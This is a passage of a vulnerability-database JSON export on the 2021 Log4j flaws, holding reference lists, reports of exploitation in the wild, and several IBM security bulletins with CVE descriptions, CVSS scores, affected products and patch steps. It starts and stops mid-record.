["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165642"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2022:0082", "RHSA-2022:0223", "RHSA-2022:0289"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2021:4111-1", "OPENSUSE-SU-2021:4112-1", "OPENSUSE-SU-2022:0040-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:0468E8E1C5525F2A9F2ED37592AE0910", "THN:15D4F25153F9911661383B3B2153469D", "THN:16B3DB5DFBB6E86B79815E0E44D48021", "THN:1E1BEA193C556F91F471CD5B785B85B3", "THN:1E4DA950F02E02DFD1649B39A06A82C6", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:317555CB8AA3A9E1AE70E218E44CC2EE", "THN:36D12A8768EE450B36B1C8D186F023E5", "THN:3E7257F45C71DCBDD0C320E7AAF383CA", "THN:4BC5D1A9ACDADBABF85BF51166D61386", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:5D8CEBFFF41D128545CD83F6F45D68F4", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:656628F2B0FBE9789F4434FCAFFBCFE1", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:683B509BDB84EA9FEBCF0B1EE68D0C08", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6E47D45D685F44083BE0A6763799D209", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:88184AFF85BF7EC0848D95E6BB0BEDB4", "THN:933FE23273AB5250B949633A337D44E1", "THN:9C12FFDB69779929861327CF77B13726", "THN:A12549603E494D035DF4BABEC04EBD5D", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C221700D7BBC27110090E137F7288FA3", "THN:DC2D78987D283D806FF145511EF10596", "THN:E006E516DD134F047ED991AC23F057A4", "THN:F8D94BE25D6D25E0F52FB4433E619721", "THN:FADB0A82C9DCE0870E617D4A8E5A34A6"]}, {"type": "threatpost", "idList": ["THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.10", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "exploitation": null, "vulnersScore": 4.0}, "_state": {"wildexploited": 0, "dependencies": 0, "score": 0}, "_internal": {"wildexploited_cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"]}, "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Threat Feed": "", "News Article or Blog": "", "Personally observed in an environment": ""}, "wildExploitedReports": [{"category": "Threat Feed", "source_url": "https://twitter.com/GreyNoiseIO/status/1469326260803416073", "published": "2021-12-10T18:35:00"}, {"category": "News Article or Blog", "source_url": "https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/", "published": "2021-12-10T18:35:00"}, {"category": "Personally observed in an environment", "source_url": "", "published": "2021-12-10T18:35:00"}, {"category": "News Article or Blog", "source_url": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/", "published": "2021-12-10T22:48:00"}, {"category": "Threat Feed", "source_url": "", "published": "2021-12-11T16:33:00"}, {"category": "News Article or Blog", "source_url": "", "published": "2021-12-11T16:33:00"}, {"category": "Personally observed in an environment", "source_url": "", "published": "2021-12-11T16:33:00"}, {"category": "Threat Feed", "source_url": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/", "published": "2021-12-12T08:47:00"}, {"category": "Personally observed in an environment", "source_url": "", "published": "2021-12-16T09:07:00"}, {"category": "News Article or Blog", "source_url": "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement", "published": "2021-12-17T16:03:00"}, {"category": "Personally observed in an environment", "source_url": "", "published": "2021-12-21T01:23:00"}, {"category": "News Article or Blog", "source_url": "https://www.tenable.com/blog/contileaks-chats-reveal-over-30-vulnerabilities-used-by-conti-ransomware-affiliates", "published": "2022-03-29T18:03:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228"], "Advisory": ["https://logging.apache.org/log4j/2.x/security.html", "http://www.openwall.com/lists/oss-security/2021/12/10/1", "http://www.openwall.com/lists/oss-security/2021/12/10/2", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", "http://www.openwall.com/lists/oss-security/2021/12/10/3", "https://security.netapp.com/advisory/ntap-20211210-0007/", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html", "https://www.debian.org/security/2021/dsa-5020", "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/", "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/", "http://www.openwall.com/lists/oss-security/2021/12/13/2", "http://www.openwall.com/lists/oss-security/2021/12/13/1", "http://www.openwall.com/lists/oss-security/2021/12/14/4", "https://www.kb.cert.org/vuls/id/930724", "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf", "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html", "http://www.openwall.com/lists/oss-security/2021/12/15/3", "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf", "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/", "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf", "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", "https://support.apple.com/kb/HT213189", "http://seclists.org/fulldisclosure/2022/Mar/23"], "Miscellaneous": ["http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "https://twitter.com/kurtseifried/status/1469345530182455296", "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html", "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html", "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html", "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html", "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html", "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html", "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html", "https://www.oracle.com/security-alerts/cpujan2022.html", "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html", "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md", "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html", "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001", "https://github.com/cisagov/log4j-affected-db", "https://www.oracle.com/security-alerts/cpuapr2022.html", "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228", "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "default_configuration"], "mitre_vector": {"Discovery": ["Account Discovery: Email Account(Validated)"], "Execution": ["Command and Scripting Interpreter: Python(Validated)", "Command and Scripting Interpreter: JavaScript/JScript(Validated)"], "Exfiltration": ["Exfiltration Over Other Network Medium(Validated)"]}, "last_activity": "2022-03-29T18:03:00"}

{"ibm": [{"lastseen": "2022-03-28T23:36:08", "description": "## Summary\n\nA new vulnerability with log4j has been detected. MAS Monitor uses log4j in all releases and interim fixes are now available for our 8.4, 8.5 and 8.6 releases. More details of the vulnerability are available here: https://nvd.nist.gov/vuln/detail/CVE-2021-44228\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nMonitor Component| All \n \n\n\n## Remediation/Fixes\n\nTo receive the interim fix update your Red Hat OpenShift deployments for each of the Monitor API pods to point to the newly published fix image in IBM Cloud Registry.\n\nSteps:\n\nFirst, disable the Monitor operator by decrementing the number of pods instantiated by the operator deployment from 1 to 0. \n\nNow go each of these 5 deployments: rest-meta, rest-kpi, rest-master, rest-datalake and rest-dscmanager. \n\n \n\n\nChange the image tag from the released version to this image version\n\n \n\n\nFor 8.6:\n\n8.6.2-pre.8.6.hotfix\n\n \n\n\nFor 8.5:\n\n8.5.7-pre.8.5.hotfix\n\n \n\n\nFor 8.4:\n\n8.4.12-pre.8.4.hotfix\n\nAfter the pods restart the interim fix has been applied\n\n \n\n\nMove to this directory on each pod. \n \n \n cd /opt/was/liberty/wlp/usr/servers/default/dropins\n\nList the files in the war. \n \n \n unzip -l *.war\n\nVerify your log4j.jar is version 2.15.0.\n\n \n\n\n**Reenable your operator to automatically install/receive future fixpacks as they are released on OLM.**\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRHPA\",\"label\":\"IBM Maximo Application Suite\"},\"Component\":\"Monitor Component\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"All\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T17:37:28", "type": "ibm", "title": "Security Bulletin: MAS Monitor 8.4, 8.5, and 8.6 log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-28T17:37:28", "id": "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "href": "https://www.ibm.com/support/pages/node/6566913", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T23:37:07", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM WebSphere Application Server Patterns. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. A remote attacker with control over Thread Context Map (MDC) input data or a Thread Context Map pattern to exploit this vulnerability to craft malicious input data using a JNDI Lookup pattern and cause a denial of service. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version** \n \n---|--- \nIBM WebSphere Application Server Patterns, all versions| WebSphere Application Server: \n\n * 9.0\n * 8.5\n * 8.0\n * Liberty \n \n \n\n\n## Remediation/Fixes\n\nPlease consult the following security bulletin for vulnerability details and information about fixes \n\n * [Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Product\":{\"code\":\"SSAJ7T\",\"label\":\"WebSphere Application Server Patterns\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"Version Independent\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:14:11", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in WebSphere Application Server shipped with IBM WebSphere Application Server Patterns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:14:11", "id": "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "href": "https://www.ibm.com/support/pages/node/6527326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-03T21:26:54", "description": "## Summary\n\nThere is a vulnerability in the Apache log4j library used by IBM WebSphere Application Server in the Admin Console and UDDI Registry application and used by the IBM WebSphere Application Server Liberty for z/OS in features zosConnect-1.0 and zosConnect-1.2. This has been addressed in IBM WebSphere Application Server by removing log4j from the Admin Console and UDDI Registry application. This has been addressed in IBM WebSphere Application Server Liberty for z/OS by removing log4j from the zosConnect-1.0 and zosConnect-1.2 features.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Master Data Management| 12.0 \n \nInfoSphere Master Data Management\n\n| 11.6 \n \n\n\n## Remediation/Fixes\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nInfoSphere Master Data Management v11.6, v12.0| IBM WebSphere Application Server version 9.0.| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/security-bulletin-multiple-vulnerabilities-apache-log4j-affect-ibm-websphere-application-server-and-ibm-websphere-application-server-liberty-cve-2021-4104-cve-2021-45046> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWSR9\",\"label\":\"IBM InfoSphere Master Data Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF048\",\"label\":\"SUSE\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"12.0, 11.6\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-27T10:23:01", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server used by IBM Master Data Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 